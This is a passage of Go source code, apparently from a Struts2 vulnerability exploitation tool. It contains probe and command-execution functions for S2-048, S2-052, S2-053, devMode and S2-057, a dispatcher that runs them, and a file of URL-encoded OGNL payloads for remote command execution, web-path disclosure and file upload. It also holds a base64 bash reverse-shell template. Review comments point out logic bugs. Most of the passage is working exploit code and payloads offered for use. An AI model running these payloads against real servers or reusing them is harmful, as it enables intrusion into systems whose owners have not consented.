			Post(c.Url)
	}
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// PocS048 S2-048: affected versions Struts 2.3.x with the Struts 1 plugin and a Struts 1 action;
// data is sent via a POST request; default parameters: username, password; supports arbitrary
// command execution.
// NOTE(review): the second stage is meant to retry with the password parameter, but by then
// c.postData has already been set by the first stage, so the `c.postData == ""` test is false
// and the Replace of "{exp}" finds nothing left to replace; the second request therefore
// repeats the first one. Same pattern in ExpS048Cmd, PocS053 and ExpS053Cmd.
func (c *WorkExp) PocS048() {
	var (
		resp *req.Response
		err  error
	)
	r1 := rand.Intn(10000) + 1000
	r2 := rand.Intn(10000) + 1000
	Payload := strings.Replace(utils.ExecPayload048, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
	if c.postData == "" {
		c.postData = "username=" + Payload
	} else {
		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
	}
	if c.contentType == "" {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", "application/x-www-form-urlencoded").
			Post(c.Url)
	} else {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", c.contentType).
			Post(c.Url)
	}
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-048!")
		} else {
			// second stage (see the NOTE above)
			if c.postData == "" {
				c.postData = "password=" + Payload
			} else {
				c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
			}
			if c.contentType == "" {
				resp, err = client.R().
					SetBody(c.postData).
					SetHeader("Content-Type", "application/x-www-form-urlencoded").
					Post(c.Url)
			} else {
				resp, err = client.R().
					SetBody(c.postData).
					SetHeader("Content-Type", c.contentType).
					Post(c.Url)
			}
			if err != nil {
				// transport errors are silently discarded
			}
			if resp != nil {
				if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
					color.Red("*Found Struts2-048!")
				} else {
					fmt.Println("Struts2-048 Not Vulnerable.")
				}
			}
		}
	}
}

// ExpS048Cmd POSTs the S2-048 template carrying c.Cmd twice (username stage, then password
// stage) and prints both response bodies. See the NOTE on PocS048 about the second stage.
func (c *WorkExp) ExpS048Cmd() {
	var (
		resp *req.Response
		err  error
	)

	Payload := strings.Replace(utils.ExecPayload048, "{cmd}", c.Cmd, -1)
	if c.postData == "" {
		c.postData = "username=" + Payload
	} else {
		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
	}
	if c.contentType == "" {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", "application/x-www-form-urlencoded").
			Post(c.Url)
	} else {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", c.contentType).
			Post(c.Url)
	}
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}

	// second stage
	if c.postData == "" {
		c.postData = "password=" + Payload
	} else {
		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
	}
	if c.contentType == "" {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", "application/x-www-form-urlencoded").
			Post(c.Url)
	} else {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", c.contentType).
			Post(c.Url)
	}
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// ExpS052Cmd S2-052: affected versions Struts 2.1.2-2.3.33, 2.5-2.5.12; data is sent via a POST
// request, no parameter needed; supports arbitrary command execution (no output echoed back).
// The body is sent as application/xml; the request is only issued when c.contentType is empty.
// Note that the whole response value is printed here, not resp.String() as elsewhere.
func (c *WorkExp) ExpS052Cmd() {
	var (
		resp *req.Response
		err  error
	)
	c.postData = strings.Replace(utils.ExecPayload052, "{cmd}", c.Cmd, -1)
	if c.contentType == "" {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", "application/xml").
			Post(c.Url)
	}
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp)
	}
}

// PocS053 S2-053: affected versions Struts 2.0.1-2.3.33, 2.5-2.5.10; data is sent via a POST
// request; default parameters: username, password; supports arbitrary command execution.
// Same two-stage structure as PocS048, including the second-stage caveat noted there.
func (c *WorkExp) PocS053() {
	var (
		resp *req.Response
		err  error
	)
	r1 := rand.Intn(10000) + 1000
	r2 := rand.Intn(10000) + 1000
	Payload := strings.Replace(utils.ExecPayload053, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
	if c.postData == "" {
		c.postData = "username=" + Payload
	} else {
		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
	}
	if c.contentType == "" {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", "application/x-www-form-urlencoded").
			Post(c.Url)
	} else {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", c.contentType).
			Post(c.Url)
	}
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-053!")
		} else {
			// second stage
			if c.postData == "" {
				c.postData = "password=" + Payload
			} else {
				c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
			}
			if c.contentType == "" {
				resp, err = client.R().
					SetBody(c.postData).
					SetHeader("Content-Type", "application/x-www-form-urlencoded").
					Post(c.Url)
			} else {
				resp, err = client.R().
					SetBody(c.postData).
					SetHeader("Content-Type", c.contentType).
					Post(c.Url)
			}
			if err != nil {
				// transport errors are silently discarded
			}
			if resp != nil {
				if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
					color.Red("*Found Struts2-053!")
				} else {
					fmt.Println("Struts2-053 Not Vulnerable.")
				}
			}
		}
	}
}

// ExpS053Cmd POSTs the S2-053 template carrying c.Cmd twice (username stage, then password
// stage) and prints both response bodies. Same second-stage caveat as PocS048.
func (c *WorkExp) ExpS053Cmd() {
	var (
		resp *req.Response
		err  error
	)
	Payload := strings.Replace(utils.ExecPayload053, "{cmd}", c.Cmd, -1)
	if c.postData == "" {
		c.postData = "username=" + Payload
	} else {
		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
	}
	if c.contentType == "" {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", "application/x-www-form-urlencoded").
			Post(c.Url)
	} else {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", c.contentType).
			Post(c.Url)
	}
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}

	// second stage
	if c.postData == "" {
		c.postData = "password=" + Payload
	} else {
		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
	}
	if c.contentType == "" {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", "application/x-www-form-urlencoded").
			Post(c.Url)
	} else {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", c.contentType).
			Post(c.Url)
	}
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}

}

// PocDevMode S2-devMode: affected versions Struts 2.1.0-2.3.1; data is sent via a GET request;
// supports fetching the web path and arbitrary command execution.
func (c *WorkExp) PocDevMode() {
	r1 := rand.Intn(10000) + 1000
	r2 := rand.Intn(10000) + 1000
	Payload := c.Url + utils.ExecPayloadDevMode
	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-devMode!")
		} else {
			fmt.Println("Struts2-devMode Not Vulnerable.")
		}
	}
}

// ExpDevModeCmd substitutes c.Cmd into the devMode template and prints the response body.
func (c *WorkExp) ExpDevModeCmd() {
	Payload := c.Url + utils.ExecPayloadDevMode
	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// ExpDevModeGetPath requests the devMode web-path template and prints the response body.
func (c *WorkExp) ExpDevModeGetPath() {
	Payload := c.Url + utils.WebPathDevMode
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// PocS057 S2-057: affected versions Struts 2.0.4-2.3.34, Struts 2.5.0-2.5.16; data is sent via a
// GET request; supports arbitrary command execution.
// Four template variants (ExecPayload057a/b/c/d) are tried in turn with the same r1/r2 marker;
// each variant prints its own verdict.
func (c *WorkExp) PocS057() {
	r1 := rand.Intn(10000) + 1000
	r2 := rand.Intn(10000) + 1000
	Payload := c.Url + utils.ExecPayload057a
	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-057!-> ExecPayload057a")
		} else {
			fmt.Println("Struts2-057 Not Vulnerable. -> ExecPayload057a")
		}
	}

	// variant b
	Payload = c.Url + utils.ExecPayload057b
	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
	resp, err = client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-057!-> ExecPayload057b")
		} else {
			fmt.Println("Struts2-057 Not Vulnerable. -> ExecPayload057b")
		}
	}

	// variant c
	Payload = c.Url + utils.ExecPayload057c
	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
	resp, err = client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-057!-> ExecPayload057c")
		} else {
			fmt.Println("Struts2-057 Not Vulnerable. -> ExecPayload057c")
		}
	}

	// variant d
	Payload = c.Url + utils.ExecPayload057d
	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
	resp, err = client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-057!-> ExecPayload057d")
		} else {
			fmt.Println("Struts2-057 Not Vulnerable. -> ExecPayload057d")
		}
	}
}

// ExpS057Cmd sends c.Cmd through all four S2-057 template variants and prints each response
// body in turn.
func (c *WorkExp) ExpS057Cmd() {
	Payload := c.Url + utils.ExecPayload057a
	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}

	Payload = c.Url + utils.ExecPayload057b
	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
	resp, err = client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}

	Payload = c.Url + utils.ExecPayload057c
	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
	resp, err = client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}

	Payload = c.Url + utils.ExecPayload057d
	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
	resp, err = client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// Run dispatches on c.CveName to the matching probe (PocXxx) or helper (ExpXxx). The allPoc case
// runs every probe in sequence on the same receiver, so probes that rewrite c.Url or c.postData
// in place (PocS009, PocS012, PocS029, PocS046, PocS048, PocS053) change the input seen by the
// probes that follow them. An unrecognised CveName matches no case and does nothing.
func (c *WorkExp) Run() {
	switch c.CveName {
	// s2-001
	case "s2-001":
		c.PocS001()
	case "s2-001_Cmd":
		c.ExpS001Cmd()
	case "s2-001_WebPath":
		c.ExpS001GetPath()
	// s2-003
	case "s2-003":
		c.PocS003()
	case "s2-003_Cmd":
		c.ExpS003Cmd()
	// s2-005
	case "s2-005":
		c.PocS005()
	case "s2-005_Cmd":
		c.ExpS005Cmd()
	case "s2-005_WebPath":
		c.ExpS005GetPath()
	//s2-007
	case "s2-007":
		c.PocS007()
	case "s2-007_Cmd":
		c.ExpS007Cmd()
	//s2-008
	case "s2-008":
		c.PocS008()
	case "s2-008_Cmd":
		c.ExpS008Cmd()
	//s2-009
	case "s2-009":
		c.PocS009()
	case "s2-009_Cmd":
		c.ExpS009Cmd()
	//s2-012
	case "s2-012":
		c.PocS012()
	case "s2-012_Cmd":
		c.ExpS012Cmd()
	//s2-013
	case "s2-013":
		c.PocS013()
	case "s2-013_Cmd":
		c.ExpS013Cmd()
	// NOTE(review): the label reads s2-012_WebPath but it dispatches to the S2-013 path helper,
	// and there is no s2-013_WebPath case — presumably a typo; confirm the intended name.
	case "s2-012_WebPath":
		c.ExpS013GetPath()
	//s2-015
	case "s2-015":
		c.PocS015()
	case "s2-015_Cmd":
		c.ExpS015Cmd()
	//s2-016
	case "s2-016":
		c.PocS016()
	case "s2-016_Cmd":
		c.ExpS016Cmd()
	case "s2-016_WebPath":
		c.ExpS016GetPath()
	//s2-019
	case "s2-019":
		c.PocS019()
	case "s2-019_Cmd":
		c.ExpS019Cmd()
	case "s2-019_WebPath":
		c.ExpS019GetPath()
	//s2-029
	case "s2-029":
		c.PocS029()
	case "s2-029_Cmd":
		c.ExpS029Cmd()
	//s2-032
	case "s2-032":
		c.PocS032()
	case "s2-032_Cmd":
		c.ExpS032Cmd()
	case "s2-032_WebPath":
		c.ExpS032GetPath()
	//s2-033
	case "s2-033":
		c.PocS033()
	case "s2-033_Cmd":
c.ExpS033Cmd() 1671 | //s2-037 1672 | case "s2-037": 1673 | c.PocS037() 1674 | case "s2-037_Cmd": 1675 | c.ExpS037Cmd() 1676 | case "s2-037_WebPath": 1677 | c.ExpS037GetPath() 1678 | //s2-045 1679 | case "s2-045": 1680 | c.PocS045() 1681 | case "s2-045_Cmd": 1682 | c.ExpS045Cmd() 1683 | case "s2-045_WebPath": 1684 | c.ExpS045GetPath() 1685 | //s2-046 1686 | case "s2-046": 1687 | c.PocS046() 1688 | case "s2-046_Cmd": 1689 | c.ExpS046Cmd() 1690 | case "s2-046_WebPath": 1691 | c.ExpS046GetPath() 1692 | //s2-048 1693 | case "s2-048": 1694 | c.PocS048() 1695 | case "s2-048_Cmd": 1696 | c.ExpS048Cmd() 1697 | //s2-052 1698 | case "s2-052_Cmd": 1699 | c.ExpS052Cmd() 1700 | //s2-053 1701 | case "s2-053": 1702 | c.PocS053() 1703 | case "s2-053_Cmd": 1704 | c.ExpS053Cmd() 1705 | //s2-devMode 1706 | case "s2-devMode": 1707 | c.PocDevMode() 1708 | case "s2-devMode_Cmd": 1709 | c.ExpDevModeCmd() 1710 | case "s2-devMode_WebPath": 1711 | c.ExpDevModeGetPath() 1712 | // s2-057 1713 | case "s2-057": 1714 | c.PocS057() 1715 | case "s2-057_Cmd": 1716 | c.ExpS057Cmd() 1717 | case "allPoc": 1718 | c.PocS001() 1719 | c.PocS003() 1720 | c.PocS005() 1721 | c.PocS007() 1722 | c.PocS008() 1723 | c.PocS009() 1724 | c.PocS012() 1725 | c.PocS013() 1726 | c.PocS015() 1727 | c.PocS016() 1728 | c.PocS019() 1729 | c.PocS029() 1730 | c.PocS032() 1731 | c.PocS033() 1732 | c.PocS037() 1733 | c.PocS045() 1734 | c.PocS046() 1735 | c.PocS048() 1736 | c.PocS053() 1737 | c.PocDevMode() 1738 | c.PocS057() 1739 | } 1740 | } 1741 | -------------------------------------------------------------------------------- /pkg/utils/utils.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | var ( 4 | // GlobalUserAgent User Agent 5 | GlobalUserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" 6 | // CheckPoc S2-001 7 | CheckPoc = "%25%7B{num1}%2B{num2}%7D" 8 | WebPath = 
"%25%7B%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23response%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23response.println(%23req.getRealPath('%2F'))%2C%23response.flush()%2C%23response.close()%7D" 9 | ExecPayload = "%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B{cmd}%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D" 10 | Shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}" 11 | ) 12 | 13 | // Exec_payload s2-003 14 | var Exec_payload = "%28%27%5Cu0023context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27{cmd}%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte[51020]%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29" 15 | 16 | // s2-005 17 | var ( 18 | Web_path = 
"%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43req%5C75@org.apache.struts2.ServletActionContext@getRequest%28%29%27%29%28d%29%29&%28i2%29%28%28%27%5C43xman%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28i97%29%28%28%27%5C43xman.getWriter%28%29.println%28%5C43req.getRealPath%28%22%5Cu005c%22%29%29%27%29%28d%29%29&%28i99%29%28%28%27%5C43xman.getWriter%28%29.close%28%29%27%29%28d%29%29" 19 | Exec_payload1 = "%28%27%5Cu0023context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27{cmd}%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte[51020]%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29" 20 | Exec_payload2 = 
"%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43mycmd%5C75%5C%27{cmd}%5C%27%27%29%28d%29%29&%28h%29%28%28%27%5C43myret%5C75@java.lang.Runtime@getRuntime%28%29.exec%28%5C43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27%5C43mydat%5C75new%5C40java.io.DataInputStream%28%5C43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27%5C43myres%5C75new%5C40byte[51020]%27%29%28d%29%29&%28k%29%28%28%27%5C43mydat.readFully%28%5C43myres%29%27%29%28d%29%29&%28l%29%28%28%27%5C43mystr%5C75new%5C40java.lang.String%28%5C43myres%29%27%29%28d%29%29&%28m%29%28%28%27%5C43myout%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27%5C43myout.getWriter%28%29.println%28%5C43mystr%29%27%29%28d%29%29" 21 | ) 22 | 23 | // ExecPayload007 s2-008 24 | var ExecPayload007 = "'%20%2B%20(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream()))%20%2B%20'" 25 | 26 | // ExecPayload008 s2-008 27 | var ExecPayload008 = "/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27{cmd}%27%29.getInputStream%28%29%29)" 28 | 29 | // ExecPayload009 s2-009 30 | var ExecPayload009 = 
"(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27{cmd}%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[({key})(%27meh%27)]" 31 | 32 | // ExecPayload012 s2-012 33 | var ExecPayload012 = "%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B{cmd}%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D" 34 | 35 | // s2-013 36 | var ( 37 | WebPath013 = "%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23k8out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23k8out.println(%23req.getRealPath(%22%2F%22))%2C%23k8out.close())%7D" 38 | ExecPayload013 = "%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D" 39 | UploadPaylaod013 = 
"$%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23fos=%20new%20java.io.FileOutputStream(%23req.getParameter(%22f%22)),%23fos.write(%23req.getParameter(%22t%22).getBytes()),%23fos.close(),%23outstr.println(%22OK%22),%23outstr.close())%7D" 40 | ) 41 | 42 | // ExecPayload015 s2-015 43 | var ExecPayload015 = "%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream())%2C%23q%7D" 44 | 45 | // s2-016 46 | var ( 47 | CheckPoc016 = "redirect%3A%24%7B{r1}%2B{r2}%7D" 48 | WebPath016 = "redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D" 49 | ExecPayload016a = "redirect%3A%24%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%20%7B{cmd}%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader%20(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23matt%3D%20%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C%23matt.getWriter().println%20(%23e)%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%7D" 50 | ExecPayload016b = 
"redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22{cmd}%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D" 51 | ExecPayload016c = 